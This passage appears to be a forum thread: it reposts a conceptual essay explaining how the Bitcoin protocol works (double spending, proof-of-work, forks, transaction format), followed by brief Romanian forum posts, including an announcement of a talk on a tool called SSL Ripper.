itself, i.e., the string of bits representing the digitally signed message “I, Alice, am giving Bob one infocoin”. Later protocols will be similar, in that all our forms of digital money will be just more and more elaborate messages [1]. Using serial numbers to make coins uniquely identifiable A problem with the first version of Infocoin is that Alice could keep sending Bob the same signed message over and over. Suppose Bob receives ten copies of the signed message “I, Alice, am giving Bob one infocoin”. Does that mean Alice sent Bob ten different infocoins? Was her message accidentally duplicated? Perhaps she was trying to trick Bob into believing that she had given him ten different infocoins, when the message only proves to the world that she intends to transfer one infocoin. What we’d like is a way of making infocoins unique. They need a label or serial number. Alice would sign the message “I, Alice, am giving Bob one infocoin, with serial number 8740348?. Then, later, Alice could sign the message “I, Alice, am giving Bob one infocoin, with serial number 8770431?, and Bob (and everyone else) would know that a different infocoin was being transferred. To make this scheme work we need a trusted source of serial numbers for the infocoins. One way to create such a source is to introduce a bank. This bank would provide serial numbers for infocoins, keep track of who has which infocoins, and verify that transactions really are legitimate, In more detail, let’s suppose Alice goes into the bank, and says “I want to withdraw one infocoin from my account”. The bank reduces her account balance by one infocoin, and assigns her a new, never-before used serial number, let’s say 1234567. Then, when Alice wants to transfer her infocoin to Bob, she signs the message “I, Alice, am giving Bob one infocoin, with serial number 1234567?. But Bob doesn’t just accept the infocoin. Instead, he contacts the bank, and verifies that: (a) the infocoin with that serial number belongs to Alice; and ( Alice hasn’t already spent the infocoin. If both those things are true, then Bob tells the bank he wants to accept the infocoin, and the bank updates their records to show that the infocoin with that serial number is now in Bob’s possession, and no longer belongs to Alice. Making everyone collectively the bank This last solution looks pretty promising. However, it turns out that we can do something much more ambitious. We can eliminate the bank entirely from the protocol. This changes the nature of the currency considerably. It means that there is no longer any single organization in charge of the currency. And when you think about the enormous power a central bank has – control over the money supply – that’s a pretty huge change. The idea is to make it so everyone (collectively) is the bank. In particular, we’ll assume that everyone using Infocoin keeps a complete record of which infocoins belong to which person. You can think of this as a shared public ledger showing all Infocoin transactions. We’ll call this ledger the block chain, since that’s what the complete record will be called in Bitcoin, once we get to it. Now, suppose Alice wants to transfer an infocoin to Bob. She signs the message “I, Alice, am giving Bob one infocoin, with serial number 1234567?, and gives the signed message to Bob. Bob can use his copy of the block chain to check that, indeed, the infocoin is Alice’s to give. If that checks out then he broadcasts both Alice’s message and his acceptance of the transaction to the entire network, and everyone updates their copy of the block chain. We still have the “where do serial number come from” problem, but that turns out to be pretty easy to solve, and so I will defer it to later, in the discussion of Bitcoin. A more challenging problem is that this protocol allows Alice to cheat by double spending her infocoin. She sends the signed message “I, Alice, am giving Bob one infocoin, with serial number 1234567? to Bob, and the message”I, Alice, am giving Charlie one infocoin, with [the same] serial number 1234567? to Charlie. Both Bob and Charlie use their copy of the block chain to verify that the infocoin is Alice’s to spend. Provided they do this verification at nearly the same time (before they’ve had a chance to hear from one another), both will find that, yes, the block chain shows the coin belongs to Alice. And so they will both accept the transaction, and also broadcast their acceptance of the transaction. Now there’s a problem. How should other people update their block chains? There may be no easy way to achieve a consistent shared ledger of transactions. And even if everyone can agree on a consistent way to update their block chains, there is still the problem that either Bob or Charlie will be cheated. At first glance double spending seems difficult for Alice to pull off. After all, if Alice sends the message first to Bob, then Bob can verify the message, and tell everyone else in the network (including Charlie) to update their block chain. Once that has happened, Charlie would no longer be fooled by Alice. So there is most likely only a brief period of time in which Alice can double spend. However, it’s obviously undesirable to have any such a period of time. Worse, there are techniques Alice could use to make that period longer. She could, for example, use network traffic analysis to find times when Bob and Charlie are likely to have a lot of latency in communication. Or perhaps she could do something to deliberately disrupt their communications. If she can slow communication even a little that makes her task of double spending much easier. How can we address the problem of double spending? The obvious solution is that when Alice sends Bob an infocoin, Bob shouldn’t try to verify the transaction alone. Rather, he should broadcast the possible transaction to the entire network of Infocoin users, and ask them to help determine whether the transaction is legitimate. If they collectively decide that the transaction is okay, then Bob can accept the infocoin, and everyone will update their block chain. This type of protocol can help prevent double spending, since if Alice tries to spend her infocoin with both Bob and Charlie, other people on the network will notice, and network users will tell both Bob and Charlie that there is a problem with the transaction, and the transaction shouldn’t go through. In more detail, let’s suppose Alice wants to give Bob an infocoin. As before, she signs the message “I, Alice, am giving Bob one infocoin, with serial number 1234567?, and gives the signed message to Bob. Also as before, Bob does a sanity check, using his copy of the block chain to check that, indeed, the coin currently belongs to Alice. But at that point the protocol is modified. Bob doesn’t just go ahead and accept the transaction. Instead, he broadcasts Alice’s message to the entire network. Other members of the network check to see whether Alice owns that infocoin. If so, they broadcast the message “Yes, Alice owns infocoin 1234567, it can now be transferred to Bob.” Once enough people have broadcast that message, everyone updates their block chain to show that infocoin 1234567 now belongs to Bob, and the transaction is complete. This protocol has many imprecise elements at present. For instance, what does it mean to say “once enough people have broadcast that message”? What exactly does “enough” mean here? It can’t mean everyone in the network, since we don’t a priori know who is on the Infocoin network. For the same reason, it can’t mean some fixed fraction of users in the network. We won’t try to make these ideas precise right now. Instead, in the next section I’ll point out a serious problem with the approach as described. Fixing that problem will at the same time have the pleasant side effect of making the ideas above much more precise. Proof-of-work Suppose Alice wants to double spend in the network-based protocol I just described. She could do this by taking over the Infocoin network. Let’s suppose she uses an automated system to set up a large number of separate identities, let’s say a billion, on the Infocoin network. As before, she tries to double spend the same infocoin with both Bob and Charlie. But when Bob and Charlie ask the network to validate their respective transactions, Alice’s sock puppet identities swamp the network, announcing to Bob that they’ve validated his transaction, and to Charlie that they’ve validated his transaction, possibly fooling one or both into accepting the transaction. There’s a clever way of avoiding this problem, using an idea known as proof-of-work. The idea is counterintuitive and involves a combination of two ideas: (1) to (artificially) make it computationally costly for network users to validate transactions; and (2) to reward them for trying to help validate transactions. The reward is used so that people on the network will try to help validate transactions, even though that’s now been made a computationally costly process. The benefit of making it costly to validate transactions is that validation can no longer be influenced by the number of network identities someone controls, but only by the total computational power they can bring to bear on validation. As we’ll see, with some clever design we can make it so a cheater would need enormous computational resources to cheat, making it impractical. That’s the gist of proof-of-work. But to really understand proof-of-work, we need to go through the details. Suppose Alice broadcasts to the network the news that “I, Alice, am giving Bob one infocoin, with serial number 1234567?. As other people on the network hear that message, each adds it to a queue of pending transactions that they’ve been told about, but which haven’t yet been approved by the network. For instance, another network user named David might have the following queue of pending transactions: I, Tom, am giving Sue one infocoin, with serial number 1201174. I, Sydney, am giving Cynthia one infocoin, with serial number 1295618. I, Alice, am giving Bob one infocoin, with serial number 1234567. David checks his copy of the block chain, and can see that each transaction is valid. He would like to help out by broadcasting news of that validity to the entire network. However, before doing that, as part of the validation protocol David is required to solve a hard computational puzzle – the proof-of-work. Without the solution to that puzzle, the rest of the network won’t accept his validation of the transaction. What puzzle does David need to solve? To explain that, let be a fixed hash function known by everyone in the network – it’s built into the protocol. Bitcoin uses the well-known SHA-256 hash function, but any cryptographically secure hash function will do. Let’s give David’s queue of pending transactions a label, , just so it’s got a name we can refer to. Suppose David appends a number (called the nonce) to and hashes the combination. For example, if we use “Hello, world!” (obviously this is not a list of transactions, just a string used for illustrative purposes) and the nonce then (output is in hexadecimal) h("Hello, world!0") = 1312af178c253f84028d480a6adc1e25e81caa44c749ec81976192e2ec934c64 The puzzle David has to solve – the proof-of-work – is to find a nonce such that when we append to and hash the combination the output hash begins with a long run of zeroes. The puzzle can be made more or less difficult by varying the number of zeroes required to solve the puzzle. A relatively simple proof-of-work puzzle might require just three or four zeroes at the start of the hash, while a more difficult proof-of-work puzzle might require a much longer run of zeros, say 15 consecutive zeroes. In either case, the above attempt to find a suitable nonce, with , is a failure, since the output doesn’t begin with any zeroes at all. Trying doesn’t work either: h("Hello, world!1") = e9afc424b79e4f6ab42d99c81156d3a17228d6e1eef4139be78e948a9332a7d8 We can keep trying different values for the nonce. Finally, at we obtain: h("Hello, world!4250") = 0000c3af42fc31103f1fdc0151fa747ff87349a4714df7cc52ea464e12dcd4e9 This nonce gives us a string of four zeroes at the beginning of the output of the hash. This will be enough to solve a simple proof-of-work puzzle, but not enough to solve a more difficult proof-of-work puzzle. What makes this puzzle hard to solve is the fact that the output from a cryptographic hash function behaves like a random number: change the input even a tiny bit and the output from the hash function changes completely, in a way that’s hard to predict. So if we want the output hash value to begin with 10 zeroes, say, then David will need, on average, to try different values for before he finds a suitable nonce. That’s a pretty challenging task, requiring lots of computational power. Obviously, it’s possible to make this puzzle more or less difficult to solve by requiring more or fewer zeroes in the output from the hash function. In fact, the Bitcoin protocol gets quite a fine level of control over the difficulty of the puzzle, by using a slight variation on the proof-of-work puzzle described above. Instead of requiring leading zeroes, the Bitcoin proof-of-work puzzle requires the hash of a block’s header to be lower than or equal to a number known as the target. This target is automatically adjusted to ensure that a Bitcoin block takes, on average, about ten minutes to validate. (In practice there is a sizeable randomness in how long it takes to validate a block – sometimes a new block is validated in just a minute or two, other times it may take 20 minutes or even longer. It’s straightforward to modify the Bitcoin protocol so that the time to validation is much more sharply peaked around ten minutes. Instead of solving a single puzzle, we can require that multiple puzzles be solved; with some careful design it is possible to considerably reduce the variance in the time to validate a block of transactions.) Alright, let’s suppose David is lucky and finds a suitable nonce, . Celebration! (He’ll be rewarded for finding the nonce, as described below). He broadcasts the block of transactions he’s approving to the network, together with the value for . Other participants in the Infocoin network can verify that is a valid solution to the proof-of-work puzzle. And they then update their block chains to include the new block of transactions. For the proof-of-work idea to have any chance of succeeding, network users need an incentive to help validate transactions. Without such an incentive, they have no reason to expend valuable computational power, merely to help validate other people’s transactions. And if network users are not willing to expend that power, then the whole system won’t work. The solution to this problem is to reward people who help validate transactions. In particular, suppose we reward whoever successfully validates a block of transactions by crediting them with some infocoins. Provided the infocoin reward is large enough that will give them an incentive to participate in validation. In the Bitcoin protocol, this validation process is called mining. For each block of transactions validated, the successful miner receives a bitcoin reward. Initially, this was set to be a 50 bitcoin reward. But for every 210,000 validated blocks (roughly, once every four years) the reward halves. This has happened just once, to date, and so the current reward for mining a block is 25 bitcoins. This halving in the rate will continue every four years until the year 2140 CE. At that point, the reward for mining will drop below bitcoins per block. bitcoins is actually the minimal unit of Bitcoin, and is known as a satoshi. So in 2140 CE the total supply of bitcoins will cease to increase. However, that won’t eliminate the incentive to help validate transactions. Bitcoin also makes it possible to set aside some currency in a transaction as a transaction fee, which goes to the miner who helps validate it. In the early days of Bitcoin transaction fees were mostly set to zero, but as Bitcoin has gained in popularity, transaction fees have gradually risen, and are now a substantial additional incentive on top of the 25 bitcoin reward for mining a block. You can think of proof-of-work as a competition to approve transactions. Each entry in the competition costs a little bit of computing power. A miner’s chance of winning the competition is (roughly, and with some caveats) equal to the proportion of the total computing power that they control. So, for instance, if a miner controls one percent of the computing power being used to validate Bitcoin transactions, then they have roughly a one percent chance of winning the competition. So provided a lot of computing power is being brought to bear on the competition, a dishonest miner is likely to have only a relatively small chance to corrupt the validation process, unless they expend a huge amount of computing resources. Of course, while it’s encouraging that a dishonest party has only a relatively small chance to corrupt the block chain, that’s not enough to give us confidence in the currency. In particular, we haven’t yet conclusively addressed the issue of double spending. I’ll analyse double spending shortly. Before doing that, I want to fill in an important detail in the description of Infocoin. We’d ideally like the Infocoin network to agree upon the order in which transactions have occurred. If we don’t have such an ordering then at any given moment it may not be clear who owns which infocoins. To help do this we’ll require that new blocks always include a pointer to the last block validated in the chain, in addition to the list of transactions in the block. (The pointer is actually just a hash of the previous block). So typically the block chain is just a linear chain of blocks of transactions, one after the other, with later blocks each containing a pointer to the immediately prior block: Occasionally, a fork will appear in the block chain. This can happen, for instance, if by chance two miners happen to validate a block of transactions near-simultaneously – both broadcast their newly-validated block out to the network, and some people update their block chain one way, and others update their block chain the other way: This causes exactly the problem we’re trying to avoid – it’s no longer clear in what order transactions have occurred, and it may not be clear who owns which infocoins. Fortunately, there’s a simple idea that can be used to remove any forks. The rule is this: if a fork occurs, people on the network keep track of both forks. But at any given time, miners only work to extend whichever fork is longest in their copy of the block chain. Suppose, for example, that we have a fork in which some miners receive block A first, and some miners receive block B first. Those miners who receive block A first will continue mining along that fork, while the others will mine along fork B. Let’s suppose that the miners working on fork B are the next to successfully mine a block: After they receive news that this has happened, the miners working on fork A will notice that fork B is now longer, and will switch to working on that fork. Presto, in short order work on fork A will cease, and everyone will be working on the same linear chain, and block A can be ignored. Of course, any still-pending transactions in A will still be pending in the queues of the miners working on fork B, and so all transactions will eventually be validated. Likewise, it may be that the miners working on fork A are the first to extend their fork. In that case work on fork B will quickly cease, and again we have a single linear chain. No matter what the outcome, this process ensures that the block chain has an agreed-upon time ordering of the blocks. In Bitcoin proper, a transaction is not considered confirmed until: (1) it is part of a block in the longest fork, and (2) at least 5 blocks follow it in the longest fork. In this case we say that the transaction has “6 confirmations”. This gives the network time to come to an agreed-upon the ordering of the blocks. We’ll also use this strategy for Infocoin. With the time-ordering now understood, let’s return to think about what happens if a dishonest party tries to double spend. Suppose Alice tries to double spend with Bob and Charlie. One possible approach is for her to try to validate a block that includes both transactions. Assuming she has one percent of the computing power, she will occasionally get lucky and validate the block by solving the proof-of-work. Unfortunately for Alice, the double spending will be immediately spotted by other people in the Infocoin network and rejected, despite solving the proof-of-work problem. So that’s not something we need to worry about. A more serious problem occurs if she broadcasts two separate transactions in which she spends the same infocoin with Bob and Charlie, respectively. She might, for example, broadcast one transaction to a subset of the miners, and the other transaction to another set of miners, hoping to get both transactions validated in this way. Fortunately, in this case, as we’ve seen, the network will eventually confirm one of these transactions, but not both. So, for instance, Bob’s transaction might ultimately be confirmed, in which case Bob can go ahead confidently. Meanwhile, Charlie will see that his transaction has not been confirmed, and so will decline Alice’s offer. So this isn’t a problem either. In fact, knowing that this will be the case, there is little reason for Alice to try this in the first place. An important variant on double spending is if Alice = Bob, i.e., Alice tries to spend a coin with Charlie which she is also “spending” with herself (i.e., giving back to herself). This sounds like it ought to be easy to detect and deal with, but, of course, it’s easy on a network to set up multiple identities associated with the same person or organization, so this possibility needs to be considered. In this case, Alice’s strategy is to wait until Charlie accepts the infocoin, which happens after the transaction has been confirmed 6 times in the longest chain. She will then attempt to fork the chain before the transaction with Charlie, adding a block which includes a transaction in which she pays herself: Unfortunately for Alice, it’s now very difficult for her to catch up with the longer fork. Other miners won’t want to help her out, since they’ll be working on the longer fork. And unless Alice is able to solve the proof-of-work at least as fast as everyone else in the network combined – roughly, that means controlling more than fifty percent of the computing power – then she will just keep falling further and further behind. Of course, she might get lucky. We can, for example, imagine a scenario in which Alice controls one percent of the computing power, but happens to get lucky and finds six extra blocks in a row, before the rest of the network has found any extra blocks. In this case, she might be able to get ahead, and get control of the block chain. But this particular event will occur with probability. A more general analysis along these lines shows that Alice’s probability of ever catching up is infinitesimal, unless she is able to solve proof-of-work puzzles at a rate approaching all other miners combined. Of course, this is not a rigorous security analysis showing that Alice cannot double spend. It’s merely an informal plausibility argument. The original paper introducing Bitcoin did not, in fact, contain a rigorous security analysis, only informal arguments along the lines I’ve presented here. The security community is still analysing Bitcoin, and trying to understand possible vulnerabilities. You can see some of this research listed here, and I mention a few related problems in the “Problems for the author” below. At this point I think it’s fair to say that the jury is still out on how secure Bitcoin is. The proof-of-work and mining ideas give rise to many questions. How much reward is enough to persuade people to mine? How does the change in supply of infocoins affect the Infocoin economy? Will Infocoin mining end up concentrated in the hands of a few, or many? If it’s just a few, doesn’t that endanger the security of the system? Presumably transaction fees will eventually equilibriate – won’t this introduce an unwanted source of friction, and make small transactions less desirable? These are all great questions, but beyond the scope of this post. I may come back to the questions (in the context of Bitcoin) in a future post. For now, we’ll stick to our focus on understanding how the Bitcoin protocol works. Problems for the author I don’t understand why double spending can’t be prevented in a simpler manner using two-phase commit. Suppose Alice tries to double spend an infocoin with both Bob and Charlie. The idea is that Bob and Charlie would each broadcast their respective messages to the Infocoin network, along with a request: “Should I accept this?” They’d then wait some period – perhaps ten minutes – to hear any naysayers who could prove that Alice was trying to double spend. If no such nays are heard (and provided there are no signs of attempts to disrupt the network), they’d then accept the transaction. This protocol needs to be hardened against network attacks, but it seems to me to be the core of a good alternate idea. How well does this work? What drawbacks and advantages does it have compared to the full Bitcoin protocol? Early in the section I mentioned that there is a natural way of reducing the variance in time required to validate a block of transactions. If that variance is reduced too much, then it creates an interesting attack possibility. Suppose Alice tries to fork the chain in such a way that: (a) one fork starts with a block in which Alice pays herself, while the other fork starts with a block in which Alice pays Bob; ( both blocks are announced nearly simultaneously, so roughly half the miners will attempt to mine each fork; © Alice uses her mining power to try to keep the forks of roughly equal length, mining whichever fork is shorter – this is ordinarily hard to pull off, but becomes significantly easier if the standard deviation of the time-to-validation is much shorter than the network latency; (d) after 5 blocks have been mined on both forks, Alice throws her mining power into making it more likely that Charles’s transaction is confirmed; and (e) after confirmation of Charles’s transaction, she then throws her computational power into the other fork, and attempts to regain the lead. This balancing strategy will have only a small chance of success. But while the probability is small, it will certainly be much larger than in the standard protocol, with high variance in the time to validate a block. Is there a way of avoiding this problem? Suppose Bitcoin mining software always explored nonces starting with , then . If this is done by all (or even just a substantial fraction) of Bitcoin miners then it creates a vulnerability. Namely, it’s possible for someone to improve their odds of solving the proof-of-work merely by starting with some other (much larger) nonce. More generally, it may be possible for attackers to exploit any systematic patterns in the way miners explore the space of nonces. More generally still, in the analysis of this section I have implicitly assumed a kind of symmetry between different miners. In practice, there will be asymmetries and a thorough security analysis will need to account for those asymmetries. Bitcoin Let’s move away from Infocoin, and describe the actual Bitcoin protocol. There are a few new ideas here, but with one exception (discussed below) they’re mostly obvious modifications to Infocoin. To use Bitcoin in practice, you first install a wallet program on your computer. To give you a sense of what that means, here’s a screenshot of a wallet called Multbit. You can see the Bitcoin balance on the left — 0.06555555 Bitcoins, or about 70 dollars at the exchange rate on the day I took this screenshot — and on the right two recent transactions, which deposited those 0.06555555 Bitcoins: Suppose you’re a merchant who has set up an online store, and you’ve decided to allow people to pay using Bitcoin. What you do is tell your wallet program to generate a Bitcoin address. In response, it will generate a public / private key pair, and then hash the public key to form your Bitcoin address: You then send your Bitcoin address to the person who wants to buy from you. You could do this in email, or even put the address up publicly on a webpage. This is safe, since the address is merely a hash of your public key, which can safely be known by the world anyway. (I’ll return later to the question of why the Bitcoin address is a hash, and not just the public key.) The person who is going to pay you then generates a transaction. Let’s take a look at the data from an actual transaction transferring bitcoins. What’s shown below is very nearly the raw data. It’s changed in three ways: (1) the data has been deserialized; (2) line numbers have been added, for ease of reference; and (3) I’ve abbreviated various hashes and public keys, just putting in the first six hexadecimal digits of each, when in reality they are much longer. Here’s the data: 1. {"hash":"7c4025...", 2. "ver":1, 3. "vin_sz":1, 4. "vout_sz":1, 5. "lock_time":0, 6. "size":224, 7. "in":[ 8. {"prev_out": 9. {"hash":"2007ae...", 10. "n":0}, 11. "scriptSig":"304502... 042b2d..."}], 12. "out":[ 13. {"value":"0.31900000", 14. "scriptPubKey":"OP_DUP OP_HASH160 a7db6f OP_EQUALVERIFY OP_CHECKSIG"}]} Let’s go through this, line by line. Line 1 contains the hash of the remainder of the transaction, 7c4025..., expressed in hexadecimal. This is used as an identifier for the transaction. Line 2 tells us that this is a transaction in version 1 of the Bitcoin protocol. Lines 3 and 4 tell us that the transaction has one input and one output, respectively. I’ll talk below about transactions with more inputs and outputs, and why that’s useful. Line 5 contains the value for lock_time, which can be used to control when a transaction is finalized. For most Bitcoin transactions being carried out today the lock_time is set to 0, which means the transaction is finalized immediately. Line 6 tells us the size (in bytes) of the transaction. Note that it’s not the monetary amount being transferred! That comes later. Lines 7 through 11 define the input to the transaction. In particular, lines 8 through 10 tell us that the input is to be taken from the output from an earlier transaction, with the given hash, which is expressed in hexadecimal as 2007ae.... The n=0 tells us it’s to be the first output from that transaction; we’ll see soon how multiple outputs (and inputs) from a transaction work, so don’t worry too much about this for now. Line 11 contains the signature of the person sending the money, 304502..., followed by a space, and then the corresponding public key, 04b2d.... Again, these are both in hexadecimal. One thing to note about the input is that there’s nothing explicitly specifying how many bitcoins from the previous transaction should be spent in this transaction. In fact, all the bitcoins from the n=0th output of the previous transaction are spent. So, for example, if the n=0th output of the earlier transaction was 2 bitcoins, then 2 bitcoins will be spent in this transaction. This seems like an inconvenient restriction – like trying to buy bread with a 20 dollar note, and not being able to break the note down. The solution, of course, is to have a mechanism for providing change. This can be done using transactions with multiple inputs and outputs, which we’ll discuss in the next section. Lines 12 through 14 define the output from the transaction. In particular, line 13 tells us the value of the output, 0.319 bitcoins. Line 14 is somewhat complicated. The main thing to note is that the string a7db6f... is the Bitcoin address of the intended recipient of the funds (written in hexadecimal). In fact, Line 14 is actually an expression in Bitcoin’s scripting language. I’m not going to describe that language in detail in this post, the important thing to take away now is just that a7db6f... is the Bitcoin address. You can now see, by the way, how Bitcoin addresses the question I swept under the rug in the last section: where do Bitcoin serial numbers come from? In fact, the role of the serial number is played by transaction hashes. In the transaction above, for example, the recipient is receiving 0.319 Bitcoins, which come out of the first output of an earlier transaction with hash 2007ae... (line 9). If you go and look in the block chain for that transaction, you’d see that its output comes from a still earlier transaction. And so on. There are two clever things about using transaction hashes instead of serial numbers. First, in Bitcoin there’s not really any separate, persistent “coins” at all, just a long series of transactions in the block chain. It’s a clever idea to realize that you don’t need persistent coins, and can just get by with a ledger of transactions. Second, by operating in this way we remove the need for any central authority issuing serial numbers. Instead, the serial numbers can be self-generated, merely by hashing the transaction. In fact, it’s possible to keep following the chain of transactions further back in history. Ultimately, this process must terminate. This can happen in one of two ways. The first possibilitty is that you’ll arrive at the very first Bitcoin transaction, contained in the so-called Genesis block. This is a special transaction, having no inputs, but a 50 Bitcoin output. In other words, this transaction establishes an initial money supply. The Genesis block is treated separately by Bitcoin clients, and I won’t get into the details here, although it’s along similar lines to the transaction above. You can see the deserialized raw data here, and read about the Genesis block here. The second possibility when you follow a chain of transactions back in time is that eventually you’ll arrive at a so-called coinbase transaction. With the exception of the Genesis block, every block of transactions in the block chain starts with a special coinbase transaction. This is the transaction rewarding the miner who validated that block of transactions. It uses a similar but not identical format to the transaction above. I won’t go through the format in detail, but if you want to see an example, see here. You can read a little more about coinbase transactions here. Something I haven’t been precise about above is what exactly is being signed by the digital signature in line 11. The obvious thing to do is for the payer to sign the whole transaction (apart from the transaction hash, which, of course, must be generated later). Currently, this is not what is done – some pieces of the transaction are omitted. This makes some pieces of the transaction malleable, i.e., they can be changed later. However, this malleability does not include the amounts being paid out, senders and recipients, which can’t be changed later. I must admit I haven’t dug down into the details here. I gather that this malleability is under discussion in the Bitcoin developer community, and there are efforts afoot to reduce or eliminate this malleability. Transactions with multiple inputs and outputs In the last section I described how a transaction with a single input and a single output works. In practice, it’s often extremely convenient to create Bitcoin transactions with multiple inputs or multiple outputs. I’ll talk below about why this can be useful. But first let’s take a look at the data from an actual transaction: 1. {"hash":"993830...", 2. "ver":1, 3. "vin_sz":3, 4. "vout_sz":2, 5. "lock_time":0, 6. "size":552, 7. "in":[ 8. {"prev_out":{ 9. "hash":"3beabc...", 10. "n":0}, 11. "scriptSig":"304402... 04c7d2..."}, 12. {"prev_out":{ 13. "hash":"fdae9b...", 14. "n":0}, 15. "scriptSig":"304502... 026e15..."}, 16. {"prev_out":{ 17. "hash":"20c86b...", 18. "n":1}, 19. "scriptSig":"304402... 038a52..."}], 20. "out":[ 21. {"value":"0.01068000", 22. "scriptPubKey":"OP_DUP OP_HASH160 e8c306... OP_EQUALVERIFY OP_CHECKSIG"}, 23. {"value":"4.00000000", 24. "scriptPubKey":"OP_DUP OP_HASH160 d644e3... OP_EQUALVERIFY OP_CHECKSIG"}]} Let’s go through the data, line by line. It’s very similar to the single-input-single-output transaction, so I’ll do this pretty quickly. Line 1 contains the hash of the remainder of the transaction. This is used as an identifier for the transaction. Line 2 tells us that this is a transaction in version 1 of the Bitcoin protocol. Lines 3 and 4 tell us that the transaction has three inputs and two outputs, respectively. Line 5 contains the lock_time. As in the single-input-single-output case this is set to 0, which means the transaction is finalized immediately. Line 6 tells us the size of the transaction in bytes. Lines 7 through 19 define a list of the inputs to the transaction. Each corresponds to an output from a previous Bitcoin transaction. The first input is defined in lines 8 through 11. In particular, lines 8 through 10 tell us that the input is to be taken from the n=0th output from the transaction with hash 3beabc.... Line 11 contains the signature, followed by a space, and then the public key of the person sending the bitcoins. Lines 12 through 15 define the second input, with a similar format to lines 8 through 11. And lines 16 through 19 define the third input. Lines 20 through 24 define a list containing the two outputs from the transaction. The first output is defined in lines 21 and 22. Line 21 tells us the value of the output, 0.01068000 bitcoins. As before, line 22 is an expression in Bitcoin’s scripting language. The main thing to take away here is that the string e8c30622... is the Bitcoin address of the intended recipient of the funds. The second output is defined lines 23 and 24, with a similar format to the first output. One apparent oddity in this description is that although each output has a Bitcoin value associated to it, the inputs do not. Of course, the values of the respective inputs can be found by consulting the corresponding outputs in earlier transactions. In a standard Bitcoin transaction, the sum of all the inputs in the transaction must be at least as much as the sum of all the outputs. (The only exception to this principle is the Genesis block, and in coinbase transactions, both of which add to the overall Bitcoin supply.) If the inputs sum up to more than the outputs, then the excess is used as a transaction fee. This is paid to whichever miner successfully validates the block which the current transaction is a part of. That’s all there is to multiple-input-multiple-output transactions! They’re a pretty simple variation on single-input-single-output-transactions. One nice application of multiple-input-multiple-output transactions is the idea of change. Suppose, for example, that I want to send you 0.15 bitcoins. I can do so by spending money from a previous transaction in which I received 0.2 bitcoins. Of course, I don’t want to send you the entire 0.2 bitcoins. The solution is to send you 0.15 bitcoins, and to send 0.05 bitcoins to a Bitcoin address which I own. Those 0.05 bitcoins are the change. Of course, it differs a little from the change you might receive in a store, since change in this case is what you pay yourself. But the broad idea is similar. Conclusion That completes a basic description of the main ideas behind Bitcoin. Of course, I’ve omitted many details – this isn’t a formal specification. But I have described the main ideas behind the most common use cases for Bitcoin. While the rules of Bitcoin are simple and easy to understand, that doesn’t mean that it’s easy to understand all the consequences of the rules. There is vastly more that could be said about Bitcoin, and I’ll investigate some of these issues in future posts. For now, though, I’ll wrap up by addressing a few loose ends. How anonymous is Bitcoin? Many people claim that Bitcoin can be used anonymously. This claim has led to the formation of marketplaces such as Silk Road (and various successors), which specialize in illegal goods. However, the claim that Bitcoin is anonymous is a myth. The block chain is public, meaning that it’s possible for anyone to see every Bitcoin transaction ever. Although Bitcoin addresses aren’t immediately associated to real-world identities, computer scientists have done a great deal of work figuring out how to de-anonymize “anonymous” social networks. The block chain is a marvellous target for these techniques. I will be extremely surprised if the great majority of Bitcoin users are not identified with relatively high confidence and ease in the near future. The confidence won’t be high enough to achieve convictions, but will be high enough to identify likely targets. Furthermore, identification will be retrospective, meaning that someone who bought drugs on Silk Road in 2011 will still be identifiable on the basis of the block chain in, say, 2020. These de-anonymization techniques are well known to computer scientists, and, one presumes, therefore to the NSA. I would not be at all surprised if the NSA and other agencies have already de-anonymized many users. It is, in fact, ironic that Bitcoin is often touted as anonymous. It’s not. Bitcoin is, instead, perhaps the most open and transparent financial instrument the world has ever seen. Can you get rich with Bitcoin? Well, maybe. Tim O’Reilly once said: “Money is like gas in the car – you need to pay attention or you’ll end up on the side of the road – but a well-lived life is not a tour of gas stations!” Much of the interest in Bitcoin comes from people whose life mission seems to be to find a really big gas station. I must admit I find this perplexing. What is, I believe, much more interesting and enjoyable is to think of Bitcoin and other cryptocurrencies as a way of enabling new forms of collective behaviour. That’s intellectually fascinating, offers marvellous creative possibilities, is socially valuable, and may just also put some money in the bank. But if money in the bank is your primary concern, then I believe that other strategies are much more likely to succeed. Details I’ve omitted: Although this post has described the main ideas behind Bitcoin, there are many details I haven’t mentioned. One is a nice space-saving trick used by the protocol, based on a data structure known as a Merkle tree. It’s a detail, but a splendid detail, and worth checking out if fun data structures are your thing. You can get an overview in the original Bitcoin paper. Second, I’ve said little about the Bitcoin network – questions like how the network deals with denial of service attacks, how nodes join and leave the network, and so on. This is a fascinating topic, but it’s also something of a mess of details, and so I’ve omitted it. You can read more about it at some of the links above. Bitcoin scripting: In this post I’ve explained Bitcoin as a form of digital, online money. But this is only a small part of a much bigger and more interesting story. As we’ve seen, every Bitcoin transaction is associated to a script in the Bitcoin programming language. The scripts we’ve seen in this post describe simple transactions like “Alice gave Bob 10 bitcoins”. But the scripting language can also be used to express far more complicated transactions. To put it another way, Bitcoin is programmable money. In later posts I will explain the scripting system, and how it is possible to use Bitcoin scripting as a platform to experiment with all sorts of amazing financial instruments. Thanks for reading. If you enjoyed this essay, you may also enjoy the first chapter of my forthcoming book on neural networks and deep learning, and consider supporting its writing through Indiegogo. You may also wish to follow me on Twitter. Footnote [1] In the United States the question “Is money a form of speech?” is an important legal question, because of the protection afforded speech under the US Constitution. In my (legally uninformed) opinion digital money may make this issue more complicated. As we’ll see, the Bitcoin protocol is really a way of standing up before the rest of the world (or at least the rest of the Bitcoin network) and avowing “I’m going to give such-and-such a number of bitcoins to so-and-so a person” in a way that’s extremely difficult to repudiate. At least naively, it looks more like speech than exchanging copper coins, say. Sursa: How the Bitcoin protocol actually works | DDI
  21. Nu va primi nimeni VIP doar pentru ca a postat aici ca stie sa isi faca laba cu picioarele. Cine vrea VIP va trebui sa demonstreze ca merita. Daca nu, vom alege noi persoanele potrivite, la timpul potrivit.
  22. HTTPS everywhere (Firefox addon).
  23. Thanks. Voi face public codul sursa probabil dupa sarbatori, cand sper sa mai am timp sa lucrez sa ii dau cel putin o "forma", sa poata fi folosit.
  24. In fiecare joi, la 19:00, de obicei in Club Mojo (Bucuresti, prin Centrul Vechi), se tin niste prezentari tehnice, se socializeaza si se bea. Maine, 05 Dec, voi prezenta SSL Ripper, ceea ce am prezentat si sambata la Defcamp. Sper ca in romana, ma cam bate engleza. Mai multe detalii: https://www.rotunneling.net/articole/rotunneling-vpn-recomanda-pasionatilor-de-it-talks-by-softbinator/ Cheater va trebui sa dea o bere, prietenii stiu de ce.
